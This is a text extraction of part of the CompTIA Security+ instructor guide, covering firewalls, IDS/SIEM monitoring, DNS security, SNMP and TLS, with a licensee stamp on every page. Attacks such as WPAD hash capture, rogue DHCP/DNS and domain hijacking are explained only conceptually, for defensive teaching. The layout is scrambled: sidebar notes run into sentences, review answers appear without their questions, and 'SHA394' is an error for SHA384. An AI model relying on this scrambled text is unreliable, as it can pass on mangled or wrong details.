A proxy autoconfiguration (PAC) script allows a client to configure proxy settings without
user intervention. The Web Proxy Autodiscovery (WPAD) protocol allows browsers to locate
a PAC file. This can be an attack vector, as a malicious proxy on the local network can be
used to obtain the user's hash as the browser tries to authenticate (nopsec.com/responder-
beyond-wpad).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 263
Sample firewall ruleset configured on pfSense. This ruleset blocks all traffic from bogon networks and
a specific private address range but allows any HTTP, HTTPS, or SMTP traffic from any other source.
(Screenshot used with permission from Rubicon Communications, LLC.)
Each rule can specify whether to block or allow traffic based on several parameters,
often referred to as tuples. If you think of each rule being like a row in a database, the
tuples are the columns. For example, in the previous screenshot, the tuples include
Protocol, Source (address), (Source) Port, Destination (address), (Destination) Port, and
so on.
Even the simplest packet filtering firewall can be complex to configure securely. It is
essential to create a written policy describing what a filter ruleset should do and to test
the configuration as far as possible to ensure that the ACLs you have set up work as
intended. Also test and document changes made to ACLs. Some other basic principles
include:
• Block incoming requests from internal or private IP addresses (that have obviously
been spoofed).
• Block incoming requests from protocols that should only be functioning at a local
network level, such as ICMP, DHCP, or routing protocol traffic.
• Use penetration testing to confirm the configuration is secure. Log access attempts
and monitor the logs for suspicious activity.
Show Slide(s)
• Take the usual steps to secure the hardware on which the firewall is running and
use of the management interface. Network Address
Translation
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
264 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
A NAT gateway is a service that translates between the private addressing scheme
used by hosts on the LAN and the public addressing scheme used by router, firewall,
or proxy server on the network edge. NAT provides security in the sense that it can
manage ingress and egress traffic at well-defined points on the network edge, but it is
important to realize that it does not perform a filtering function.
There are several types of NAT:
• Static and dynamic source NAT—perform 1:1 mappings between private ("inside
local") network address and public ("inside global") addresses. These mappings can
be static or dynamically assigned.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 265
Configuring port forwarding on a pfSense firewall appliance—This rule forwards any HTTP
traffic received on the appliance's WAN interface to the 10.1.0.10 host on the LAN.
(Screenshot used with permission from pfsense.org.)
The larger IPv6 address space makes most use cases for NAT redundant. A host can use a
link-local address to contact neighboring nodes, but any routed traffic should use a globally
unique address. In IPv6 it is routing policies and firewall filtering that manage which hosts
and networks are reachable. That said, there are mechanisms for translating prefixes at the
network edge (NPTv6) and for translation between IPv6 addresses (NAT66) or IPv6 and IPv4
addresses (NAT64 and NAT46).
Virtual firewalls are usually deployed within data centers and cloud services. A virtual Virtual Firewalls
firewall can be implemented in three different ways:
• Hypervisor-based—this means that filtering functionality is built into the hypervisor Teaching
or cloud provisioning tool. You can use the cloud's web app or application Tip
programming interface (API) to write access control lists (ACLs) for traffic arriving or Note that we will
leaving a virtual host or virtual network. cover cloud security in
more detail in another
• Virtual appliance—this refers to deploying a vendor firewall appliance instance using lesson.
virtualization, in the same way you might deploy a Windows or Linux guest OS.
While they can be deployed like "regular" firewalls for zone-based routing and filtering,
virtual firewalls most significant role is to support the east-west security and zero-trust
microsegmentation design paradigms. They are able to inspect traffic as it passes from
host-to-host or between virtual networks, rather than requiring that traffic be routed
up to a firewall appliance and back.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
266 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 267
Review Activity:
Firewalls and Proxy Servers
Answer the following questions:
1. True or False? As they protect data at the highest layer of the protocol
stack, application-based firewalls have no basic packet filtering
functionality.
False. All firewall types can perform basic packet filtering (by IP address, protocol type,
port number, and so on).
A personal firewall software can block processes from accessing a network connection
as well as applying filtering rules. A personal firewall protects the local host only, while
a network firewall filters traffic for all hosts on the segment behind the firewall.
True.
True.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
268 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 10B
Implement Network
Security Monitoring
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 269
Viewing an intrusion detection alert generated by Snort in the Kibana app on Security Onion.
(Screenshot Security Onion securityonion.net)
Typically, the packet capture sensor is placed inside a firewall or close to a server of TAPs and Port Mirrors
particular importance. The idea is usually to identify malicious traffic that has managed
to get past the firewall. A single IDS can generate a very large amount of logging and Teaching
alerting data so you cannot just put multiple sensors everywhere in the network Tip
without provisioning the resources to manage them properly. Depending on network Make sure students
size and resources, one or just a few sensors will be deployed to monitor key assets or can distinguish
network paths. between appropriate
locations for sensors
There are three main options for connecting a sensor to the appropriate point in the and the location of
network: the collection/analysis
engine.
• SPAN (switched port analyzer)/mirror port—this means that the sensor is
attached to a specially configured port on the switch that receives copies of frames
addressed to nominated access ports (or all the other ports). This method is not
completely reliable. Frames with errors will not be mirrored and frames may be
dropped under heavy load.
• Passive test access point (TAP)—this is a box with ports for incoming and outgoing
network cabling and an inductor or optical splitter that physically copies the signal
from the cabling to a monitor port. There are types for copper and fiber optic
cabling. Unlike a SPAN, no logic decisions are made so the monitor port receives
every frame—corrupt or malformed or not—and the copying is unaffected by load.
• Active TAP—this is a powered device that performs signal regeneration (again, there
are copper and fiber variants), which may be necessary in some circumstances.
Gigabit signaling over copper wire is too complex for a passive tap to monitor and
some types of fiber links may be adversely affected by optical splitting. Because it
performs an active function, the TAP becomes a point of failure for the links in the
event of power loss. When deploying an active TAP, it is important to use a model
with internal batteries or connect it to a UPS.
A TAP will usually output two streams to monitor a full-duplex link (one channel for
upstream and one for downstream). Alternatively, there are aggregation TAPs, which
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
270 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
rebuild the streams into a single channel, but these can drop frames under very
heavy load.
Snort rules file supplied by the open-source Emerging Threats community feed.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 271
The signatures and rules (often called plug-ins or feeds) powering intrusion detection
need to be updated regularly to provide protection against the latest threat types.
Commercial software requires a paid-for subscription to obtain the updates. It
is important to ensure that the software is configured to update only from valid
repositories, ideally using a secure connection method, such as HTTPS.
Behavioral-based detection means that the engine is trained to recognize baseline Behavior and
"normal" traffic or events. Anything that deviates from this baseline (outside a defined Anomaly-Based
level of tolerance) generates an incident. The idea is that the software will be able to Detection
identify zero day attacks, insider threats, and other malicious activity for which there is
single signature. Teaching
Tip
Historically, this type of detection was provided by network behavior and anomaly
Make sure students
detection (NBAD) products. An NBAD engine uses heuristics (meaning to learn from understand the
experience) to generate a statistical model of what baseline normal traffic looks like. It may differences between
develop several profiles to model network use at different times of the day. This means detection methods
that the system generates false positive and false negatives until it has had time to improve and false negatives
its statistical model of what is "normal." A false positive is where legitimate behavior and false positives.
generates an alert, while a false negative is where malicious activity is not alerted.
While NBAD products were relatively unsophisticated, the use of machine learning
in more recent products has helped to make them more productive. As identified by
Gartner's market analysis (gartner.com/en/documents/3917096/market-guide-for-
user-and-entity-behavior-analytics), there are two general classes of behavior-based
detection products that utilize machine learning:
• User and entity behavior analytics (UEBA)—these products scan indicators from
multiple intrusion detection and log sources to identify anomalies. They are often
integrated with security information and event management (SIEM) platforms.
• Network traffic analysis (NTA)—these products are closer to IDS and NBAD in
that they apply analysis techniques only to network streams, rather than multiple
network and log data sources.
Often behavioral- and anomaly-based detection are taken to mean the same thing (in
the sense that the engine detects anomalous behavior). Anomaly-based detection can
also be taken to mean specifically looking for irregularities in the use of protocols. For
example, the engine may check packet headers or the exchange of packets in a session
against RFC standards and generate an alert if they deviate from strict RFC compliance.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
272 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
single console. Nevertheless, UTM has some downsides. When defense is unified under
a single system, this creates the potential for a single point of failure that could affect
an entire network. Distinct security systems, if they fail, might only compromise that
particular avenue of attack. Additionally, UTM systems can struggle with latency issues
if they are subject to too much network activity. Also, a UTM might not perform as well
as software or a device with a single dedicated security function.
To some extent, NGFW and UTM are just marketing terms. A UTM is seen as turnkey "do
everything" solution, while a NGFW is an enterprise product with fewer features, or more
modularization, and greater configuration complexity, but better performance. It can be
more helpful to focus on the specific product features, rather than trying to present an
implementation decision as a choice of either a NGFW or a UTM.
Content/URL Filter
A firewall has to sustain high loads, and overloads can increase latency or even cause
outages. The high complexity of application-aware NGFW and UTM solutions can
reduce their suitability as an edge device, because while they might provide high
confidentiality and integrity, lower throughput reduces availability. One solution to this
is to treat security solutions for server traffic differently from that for user traffic. User
traffic refers to web browsing, social networking, email, and video/VoIP connections
initiated by local network clients.
Consequently, where a stateful or NGFW firewall may be deployed for application
server traffic, the job of filtering user traffic is often performed by a separate appliance
or proxy host. A content filter is designed to apply a number of user-focused filtering
rules, such as blocking uniform resource locators (URLs) that appear on content
blacklists or applying time-based restrictions to browsing. Content filters are now
usually implemented as a class of product called a secure web gateway (SWG). As well
as filtering, a SWG performs threat analysis and often integrates the functionality of
data loss prevention (DLP) and cloud access security brokers (CASB) to protect against
the full range of unauthorized egress threats, including malware command and control
and data exfiltration.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 273
A web application firewall (WAF) is designed specifically to protect software running Web Application
on web servers and their backend databases from code injection and DoS attacks. Firewalls
WAFs use application-aware processing rules to filter traffic and perform application-
specific intrusion detection. The WAF can be programmed with signatures of known Teaching
attacks and use pattern matching to block requests containing suspect code. The Tip
output from a WAF will be written to a log, which you can inspect to determine what We'll be turning to
threats the web application might be subject to. web application
security in more detail
later in the course. Just
make sure students
can distinguish the
function of a WAF
from more general
network/host firewall/
IDS types.
With the ModSecurity WAF installed to this IIS server, a scanning attempt has been detected and logged
as an Application event. As you can see, the default ruleset generates a lot of events.
(Screenshot used with permission from Microsoft.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
274 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Network Security Monitoring
Answer the following questions:
1. What is the best option for monitoring traffic passing from host-to-host on
the same switch?
The only option for monitoring intra-switch traffic is to use a mirrored port.
Installing definition/signature updates and removing definitions that are not relevant to
the hosts or services running on your network.
Behavior-based detection can exhibit high false positive rates, where legitimate activity
is wrongly identified as malicious. With automatic prevention, this will block many
legitimate users and hosts from the network, causing availability and support issues.
4. If a Windows system file fails a file integrity check, should you suspect a
malware infection?
5. What is a WAF?
A web application firewall (WAF) is designed to protect HTTP and HTTPS applications.
It can be configured with signatures of known attacks against applications, such as
injection-based attacks or scanning attacks.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 275
Topic 10C
Summarize the Use of SIEM
Security assessments and incident response both require real-time monitoring of host
Monitoring Services
and network status indicators plus audit information.
Teaching
Packet Capture Tip
Data captured from network sensors/sniffers plus netflow sources provides both Give an overview of
the types of data that
summary statistics about bandwidth and protocol usage and the opportunity for
need to be collected,
detailed frame analysis. aggregated, and
analyzed.
Network Monitors
As distinct from network traffic monitoring, a network monitor collects data about
network appliances, such as switches, access points, routers, firewalls, and servers. This
is used to monitor load status for CPU/memory, state tables, disk capacity, fan speeds/
temperature, network link utilization/error statistics, and so on. Another important
function is a heartbeat message to indicate availability. This data might be collected
using the Simple Network Management Protocol (SNMP) or a proprietary management
system. As well as supporting availability, network monitoring might reveal unusual
conditions that could point to some kind of attack.
Logs
Logs are one of the most valuable sources of security information. A system log can
be used to diagnose availability issues. A security log can record both authorized and
unauthorized uses of a resource or privilege. Logs function both as an audit trail of
actions and (if monitored regularly) provide a warning of intrusion attempts. Log review
is a critical part of security assurance. Only referring to the logs following a major
incident is missing the opportunity to identify threats and vulnerabilities early and to
respond proactively.
Logs typically associate an action with a particular user. This is one of the reasons that it
is critical that users not share logon details. If a user account is compromised, there is no
means of tying events in the log to the actual attacker.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
276 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
OSSIM SIEM dashboard—Configurable dashboards provide the high-level status view of network
security metrics. (Screenshot used with permission from AT&T Cybersecurity.)
Log Collection
The first task for SIEM is to collect data inputs from multiple sources. There are three
main types of log collection:
• Agent-based—with this approach, you must install an agent service on each host. As
events occur on the host, logging data is filtered, aggregated, and normalized at the
host, then sent to the SIEM server for analysis and storage.
• Sensor—as well as log data, the SIEM might collect packet captures and traffic flow
data from sniffers.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 277
Enabling a log parser plug-in for a pfSense security appliance so that firewall events can be imported
into the SIEM. (Screenshot used with permission from AT&T Cybersecurity.)
Log Aggregation
As distinct from collection, aggregation refers to normalizing data from different
sources so that it is consistent and searchable. SIEM software features connectors
or plug-ins to interpret (or parse) data from distinct types of systems and to account
for differences between vendor implementations. Usually parsing will be carried out
using regular expressions tailored to each log file format to identify attributes and
content that can be mapped to standard fields in the SIEM's reporting and analysis
tools. Another important function is to normalize date/time zone differences to a
single timeline.
Where collection and aggregation produce inputs, a SIEM is also used for reporting. Analysis and Report
A critical function of SIEM—and the principal factor distinguishing it from basic log Review
management—is that of correlation. This means that the SIEM software can link
individual events or data points (observables) into a meaningful indicator of risk, Teaching
or Indicator of Compromise (IOC). Correlation can then be used to drive an alerting Tip
system. These reports would be viewed from the SIEM dashboard. Note that we will
return to the use of
Basic correlation can be performed using simple If … Then type rules. However, many SIEM and SOAR in the
SIEM solutions use artificial intelligence (AI) and machine learning as the basis for lesson on incident
automated analysis. response. Here, equip
students with a broad
User and Entity Behavior Analytics overview of product
capabilities.
A user and entity behavior analytics (UEBA) solution supports identification of malicious
behaviors from comparison to a baseline. As the name suggests, the analytics software
tracks user account behavior across different devices and cloud services. Entity refers
to machine accounts, such as client workstations or virtualized server instances, and
to embedded hardware, such as Internet of Things (IoT) devices. The complexity of
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
278 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
determining baselines and reducing false positives means that UEBA solutions are
heavily dependent on AI and machine learning. Examples include Microsoft's Advanced
Threat Analytics (docs.microsoft.com/en-us/advanced-threat-analytics/what-is-ata) and
Splunk UEBA (splunk.com/en_us/software/user-behavior-analytics.html).
Sentiment Analysis
One of the biggest challenges for behavior analytics driven by machine learning is
to identify intent. It is extremely difficult for a machine to establish the context and
interpretation of statements in natural language, though much progress is being made.
The general efforts in this area are referred to as sentiment analysis, or emotion
AI. The typical use case for sentiment analysis is to monitor social media for brand
"incidents," such as a disgruntled customer announcing on Twitter what poor customer
service they have just received. In terms of security, this can be used to gather threat
intelligence and try to identify external or insider threats before they can develop as
attacks.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 279
writes the name of the local machine along with the text "up" to the syslog server at
10.1.0.242:
logger -n 10.1.0.242 `hostname` up
Filtering a log to discover data points of interest usually involves some sort of string Regular Expressions
search, typically invoking regular expression (regex) syntax. A regular expression is and grep
a search pattern to match within a given string. The search pattern is built from the
regex syntax. This syntax defines metacharacters that function as search operators,
quantifiers, logic statements, and anchors/boundaries. The following list illustrates
some commonly used elements of regex syntax:
• [ … ] matches a single instance of a character within the brackets. This can
include literals, ranges such as [a-z], and token matches, such as [\s] (white
space) or [\d] (one digit).
• + matches one or more occurrences. A quantifier is placed after the term to match;
for example, \s+ matches one or more white space characters.
A complete description of regex syntax is beyond the scope of this course, but you can use
an online reference such as regexr.com or rexegg.com to learn it.
The grep command invokes simple string matching or regex syntax to search text files
for specific strings. This enables you to search the entire contents of a text file for a
specific pattern within each line and display that pattern on the screen or dump it to
another file. A simple example of grep usage is as follows:
grep -F 192.168.1.254 access.log
This searches the text file access.log for all lines containing some variation of the literal
string pattern 192.168.1.254 and prints only those lines to the terminal. The -F
switch instructs grep to treat the pattern as a literal.
The following example searches for any IP address in the 192.168.1.0/24 subnet using
regex syntax for the pattern (note that each period must be escaped) within any file in
any directory from the current one. The -r option enables recursion, while the period
in the target part indicates the current directory:
grep -r 192\.168\.1\.[\d]{1,3}
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
280 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Use of SIEM
Answer the following questions:
Security information and event management (SIEM) products aggregate IDS alerts and
host logs from multiple sources, then perform correlation analysis on the observables
collected to identify indicators of compromise and alert administrators to potential
incidents.
A SIEM collector parses input (such as log files or packet traces) into a standard format
that can be recorded within the SIEM and interpreted for event correlation. A sensor
collects data from the network media.
No, syslog allows remote hosts to send logs to a server, but syslog does not aggregate/
normalize the log data or run correlation rules to identify alertable events.
4. You are writing a shell script to display the last 5 lines of a log file at /var/
log/audit in a dashboard. What is the Linux command to do this?
tail /var/log/audit -n 5
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 281
Lesson 10
Summary
You should be able to use network appliances such as firewalls, proxies, IDS, and SIEM Teaching
collectors/aggregators to implement secure network designs. Tip
Check that students
Guidelines for Implementing Network Security Appliances are confident about
the content that has
Follow these guidelines when you deploy new or upgrade security appliances: been covered. If there
is time, re-visit any
• Identify the security requirements for a network zone or area and determine the content examples that
appropriate security technology to use: they have questions
about. If you have
• Network firewall to apply an ACL to incoming and outgoing traffic. used all the available
time for this lesson
• IDS, IPS, or next-gen firewall to implement signature and/or behavior-based block, note the issues,
and schedule time for
threat detection.
a review later in the
course.
• Content filter to control outbound user access to sites and services.
Interaction
• UTM to implement multiple controls within a single appliance and reporting Opportunity
interface.
Optionally, discuss
• Assess whether endpoints within the zone should be protected by additional with students how
security, such as host-based firewalls, WAFs, or file integrity monitoring. complex security
functions can be
• Evaluate the commercial model and determine whether proprietary or open-source implemented as
either separate
is the best fit for your requirements. or consolidated
solutions. Check if
• Document and test the ACL or other security configuration when implementing the students have any
device to ensure that it meets the design goals. positive or negative
experience of SIEM.
• Implement an appropriate method of log and network data collection and
aggregation to ensure monitoring and review of security events:
• Manual methods using syslog and file manipulation tools (head, tail, cat, grep,
logger).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Lesson 11
Implementing Secure
Network Protocols
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
284 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 11A
Implement Secure Network
Operations Protocols
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 285
Attacking network address allocation—a script exhausts the DHCP pool while another runs a rogue
DHCP server. A third tool operates a rogue DNS to supply spoofed information to clients configured to
use the attack machine as a DNS server, via the rogue DHCP configuration.
The Domain Name System (DNS) resolves fully qualified domain names (FQDNs) to IP Domain Name
addresses. It uses a distributed database system that contains information on domains Resolution
and hosts within those domains. The information is distributed among many name
servers, each of which holds part of the database. The name servers work over port 53. Teaching
Domain name resolution is a security-critical service and the target of many attacks on Tip
both local network and the Internet. Hopefully students
understand the basic
Domain Hijacking function of DNS and
the use of resource
Domain hijacking is an attack where an adversary acquires a domain for a company's records. The attacks
trading name or trademark, or perhaps some spelling variation thereof. While there shown here focus on
the registration of
are often trademark and intellectual property laws against doing this, companies need
domains.
to be careful to renew domain names that they want to continue to use and to protect
the credentials used to manage the registration. A domain name must be re-registered
every year.
In a domain hijacking attack an adversary gains control over the registration of a
domain name, allowing the host records to be configured to IP addresses of the
attacker's choosing. This might be accomplished by supplying false credentials to the
domain registrar when applying for a new domain name or re-registering an existing
one. An attacker might also be able to exploit the legitimate account used to manage
the domain (via a weak password or malware installed on a client computer) or even
to compromise the domain registrar's security procedures in some way (upguard.com/
blog/domain-hijacking).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
286 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
A company whose domain has been hijacked is likely to find that they are locked out
of the registrar's management console, or that the domain has been transferred to
another registrar, often operating in a different country. The whois command can be
used to lookup domain registration information to try to detect misuse in other cases.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 287
DNS is a critical service that should be configured to be fault tolerant. DoS attacks DNS Security
are hard to perform against the servers that perform Internet name resolution, but if
an attacker can target the DNS server on a private network, it is possible to seriously Teaching
disrupt the operation of that network. Tip
To ensure DNS security on a private network, local DNS servers should only accept The majority of Top
Level Domains (TLDs)
recursive queries from local hosts (preferably authenticated local hosts) and not from
and country code TLDs
the Internet. You also need to implement access control measures on the server, to are signed. Otherwise,
prevent a malicious user from altering records manually. Similarly, clients should be adoption of DNSSEC
restricted to using authorized resolvers to perform name resolution. is patchy except in
the .gov domain. You
Attacks on DNS may also target the server application and/or configuration. Many can refer students
DNS services run on BIND (Berkley Internet Name Domain), distributed by the Internet to charts about
Software Consortium (isc.org). There are known vulnerabilities in many versions of the DNSSEC adoption at
BIND server, so it is critical to patch the server to the latest version. The same general internetsociety.org/
advice applies to other DNS server software, such as Microsoft's. Obtain and check deploy360/dnssec/
statistics.
security announcements and then test and apply critical and security-related patches
and upgrades.
DNS footprinting means obtaining information about a private network by using
its DNS server to perform a zone transfer (all the records in a domain) to a rogue
DNS or simply by querying the DNS service, using a tool such as nslookup or
dig. To prevent this, you can apply an Access Control List to prevent zone transfers
to unauthorized hosts or domains, to prevent an external server from obtaining
information about the private network architecture.
DNS Security Extensions (DNSSEC) help to mitigate against spoofing and poisoning
attacks by providing a validation process for DNS responses. With DNSSEC enabled,
the authoritative server for the zone creates a "package" of resource records (called an
RRset) signed with a private key (the Zone Signing Key). When another server requests
a secure record exchange, the authoritative server returns the package along with its
public key, which can be used to verify the signature.
The public zone signing key is itself signed with a separate Key Signing Key. Separate
keys are used so that if there is some sort of compromise of the zone signing key, the
domain can continue to operate securely by revoking the compromised key and issuing
a new one.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
288 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Windows Server DNS services with DNSSEC enabled. (Screenshot used with permission from Microsoft.)
The Key Signing Key for a particular domain is validated by the parent domain or
host ISP. The top-level domain trusts are validated by the Regional Internet Registries
and the DNS root servers are self-validated, using a type of M-of-N control group key
signing. This establishes a chain of trust from the root servers down to any particular
subdomain.
• Simple bind—the client must supply its distinguished name (DN) and password, but
these are passed as plaintext.
• Simple Authentication and Security Layer (SASL)—the client and server negotiate
the use of a supported authentication mechanism, such as Kerberos. The STARTTLS
command can be used to require encryption (sealing) and message integrity
(signing). This is the preferred mechanism for Microsoft's Active Directory (AD)
implementation of LDAP.
• LDAP Secure (LDAPS)—the server is installed with a digital certificate, which it uses
to set up a secure tunnel for the user credential exchange. LDAPS uses port 636.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 289
Many applications on networks are time dependent and time critical. These include Time Synchronization
authentication and security mechanisms, scheduling applications, and backup
software. The Network Time Protocol (NTP) provides a transport over which to
Teaching
synchronize these time dependent applications. NTP works over UDP on port 123.
Tip
Top-level NTP servers (stratum 1) obtain the Coordinated Universal Time (UTC) from Most authentication
a highly accurate clock source, such as an atomic clock. Lower tier servers then and access control
obtain the UTC from multiple stratum 1 servers and sample the results to obtain an protocols are critically
authoritative time. Most organizations will use one of these stratum 2 servers to obtain dependent on time
synchronization.
the time for use on the LAN. Servers at lower tiers may then perform the same sort of Note the impact on
sampling operation, adjust for the delay involved in propagating the signal, and provide forensics and log
the time to clients. Clients themselves usually obtain the time using a modified form of analysis. If anyone's
the protocol (Simple NTP). confused by the
abbreviation UTC,
NTP has historically lacked any sort of security mechanism, but there are moves explain that it's
to create a security extension for the protocol called Network Time Security language independent
(blog.cloudflare.com/secure-time). to keep both the
British and the French
happy (or unhappy,
Simple Network Management Protocol Security perhaps).
The Simple Network Management Protocol (SNMP) is a widely used framework for Show Slide(s)
management and monitoring. SNMP consists of an SNMP monitor and agents.
• The agent is a process (software or firmware) running on a switch, router, server, or Simple Network
Management Protocol
other SNMP-compatible network device.
Security
• This agent maintains a database called a management information base (MIB) that
Teaching
holds statistics relating to the activity of the device (for example, the number of
Tip
frames per second handled by a switch). The agent is also capable of initiating a trap
SNMP is one of those
operation where it informs the management system of a notable event (port failure,
services that should
for instance). The threshold for triggering traps can be set for each value. Device be shut down if it is
queries take place over port 161 (UDP); traps are communicated over port 162 (also not being used. SNMP
UDP). may run on devices
such as switches,
• The SNMP monitor (a software program) provides a location from which network firewalls, and printers.
activity can be overseen. It monitors all agents by polling them at regular intervals
for information from their MIBs and displays the information for review. It also
displays any trap operations as alerts for the network administrator to assess and
act upon as necessary.
If SNMP is not used, you should remember to change the default configuration
password and disable it on any SNMP-capable devices that you add to the network. If
you are running SNMP v1 or v2c, keep to the following guidelines:
• SNMP community names are sent in plaintext and so should not be transmitted
over the network if there is any risk that they could be intercepted.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
290 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• Use difficult to guess community names; never leave the community name blank or
set to the default.
• Use Access Control Lists to restrict management operations to known hosts (that is,
restrict to one or two host IP addresses).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 291
Review Activity:
Secure Network Operations Protocols
Answer the following questions:
3. True or false? The contents of the HOSTS file are irrelevant as long as a DNS
service is properly configured.
False (probably)—the contents of the HOSTS file are written to the DNS cache on
startup. It is possible to edit the registry to prioritize DNS over HOSTS, though.
Corrupting the records of a DNS server to point traffic destined for a legitimate domain
to a malicious IP address.
True.
The Simple Authentication and Security Layer (SASL) allows a choice of authentication
providers and encryption (sealing)/integrity (signing) mechanisms. By contrast, LDAPS
uses Transport Layer Security (TLS) to encrypt traffic, but users still authenticate via
simple binding. Also, SASL is the standards-based means of configuring LDAP security.
Configure strong community names and use access control lists to restrict
management operations to known hosts.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
292 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 11B
Implement Secure Application Protocols
Many argue that HTTP is a stateful protocol. Version 2 of HTTP adds more state-preserving
features (blog.zamicol.com/2017/05/is-http2-stateful-protocol-application.html).
Show Slide(s)
Transport Layer
Transport Layer Security
Security
As with other early TCP/IP application protocols, HTTP communications are not
Teaching
secured. Secure Sockets Layer (SSL) was developed by Netscape in the 1990s to
Tip
address the lack of security in HTTP. SSL proved very popular with the industry, and
it was quickly adopted as a standard named Transport Layer Security (TLS). It is
Point out that SSL
can be used with
typically used with the HTTP application (referred to as HTTPS or HTTP Secure) but can
applications other also be used to secure other application protocols and as a virtual private networking
than HTTP. (VPN) solution.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 293
To implement TLS, a server is assigned a digital certificate signed by some trusted Interaction
certificate authority (CA). The certificate proves the identity of the server (assuming that Opportunity
the client trusts the CA) and validates the server's public/private key pair. The server If there is time, get
uses its key pair and the TLS protocol to agree mutually supported ciphers with the students to examine
client and negotiate an encrypted communications session. the TLS 1.2 and TLS
1.3 handshakes in a
HTTPS operates over port 443 by default. HTTPS operation is indicated by using https:// for packet capture. You
can also note the use
the URL and by a padlock icon shown in the browser.
of about:config to
modify the default
version preferences
for the browser.
It is also possible to install a certificate on the client so that the server can trust the
client. This is not often used on the web but is a feature of VPNs and enterprise
networks that require mutual authentication.
TLS version 1.3 was approved in 2018. One of the main features of TLS 1.3 is the
removal of the ability to perform downgrade attacks by preventing the use of unsecure
features and algorithms from previous versions. There are also changes to the
handshake protocol to reduce the number of messages and speed up connections.
Cipher Suites
A cipher suite is the algorithms supported by both the client and server to perform the
different encryption and hashing operations required by the protocol. Prior to TLS 1.3,
a cipher suite would be written in the following form:
ECDHE-RSA-AES128-GCM-SHA256
This means that the server can use Elliptic Curve Diffie-Hellman Ephemeral mode for
session key agreement, RSA signatures, 128-bit AES-GCM (Galois Counter Mode) for
symmetric bulk encryption, and 256-bit SHA for HMAC functions. Suites the server
prefers are listed earlier in its supported cipher list.
TLS 1.3 uses simplified and shortened suites. A typical TLS 1.3 cipher suite appears
as follows:
TLS_AES_256_GCM_SHA384
Only ephemeral key agreement is supported in 1.3 and the signature type is supplied
in the certificate, so the cipher suite only lists the bulk encryption key strength and
mode of operation (AES_256_GCM), plus the cryptographic hash algorithm (SHA394)
used within the new hash key derivation function (HKDF). HKDF is the mechanism by
which the shared secret established by D-H key agreement is used to derive symmetric
session keys.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
294 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Teaching
Tip
